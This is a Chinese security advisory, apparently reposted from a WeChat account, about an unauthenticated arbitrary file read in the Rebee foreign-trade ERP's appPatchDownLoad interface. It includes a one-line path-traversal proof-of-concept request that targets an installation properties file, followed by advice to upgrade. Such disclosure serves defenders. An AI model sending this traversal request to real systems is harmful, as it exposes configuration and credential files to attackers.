漏洞预警 | 睿贝外贸ERP任意文件读取漏洞

admin

102803
文章

87
评论

2024年4月26日08:22:14评论19 views字数 566阅读1分53秒阅读模式

0x00 漏洞编号

暂无

0x01 危险等级

高危

0x02 漏洞概述

睿贝外贸ERP软件专门为中小型外贸企业打造的一款界面简洁、易用、操作人性，几乎实现零培训，彻底颠覆其他软件漫长的实施周期。主要功能包括邮件管理、客户管理、邮营销、产品、供应商，报价、订单、出运、单证、财务、利润分析等一体化管理，以及Excel格式单据操作，单据格式随心所欲，完全满足公司现有的单据格式。

漏洞预警 | 睿贝外贸ERP任意文件读取漏洞

0x03 漏洞详情

漏洞类型：文件读取

影响：获取敏感信息

简述：睿贝外贸ERP的appPatchDownLoad接口处存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件、数据库配置文件等等，导致网站处于极度不安全状态。

0x04 影响版本

睿贝外贸ERP

0x05 POC

{url}/appPatchDownLoad?fileName=../../../../RebeeCRM/_RebeeCRM_installation/installvariables.properties

仅供安全研究与学习之用，若将工具做其他用途，由使用者承担全部法律及连带责任，作者及发布者不承担任何法律及连带责任。

0x06 修复建议

目前官方已发布漏洞修复版本，建议用户升级到安全版本：

https://rebee.cn/

原文始发于微信公众号（浅安安全）：漏洞预警 | 睿贝外贸ERP任意文件读取漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

漏洞预警 | 睿贝外贸ERP任意文件读取漏洞

暂无

CVE-2024-28253 :OpenMetadata

CVE-2024-27956 WordPress Automatic SQL注入漏洞可添加后台账号

用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

发表评论

在线咨询

微信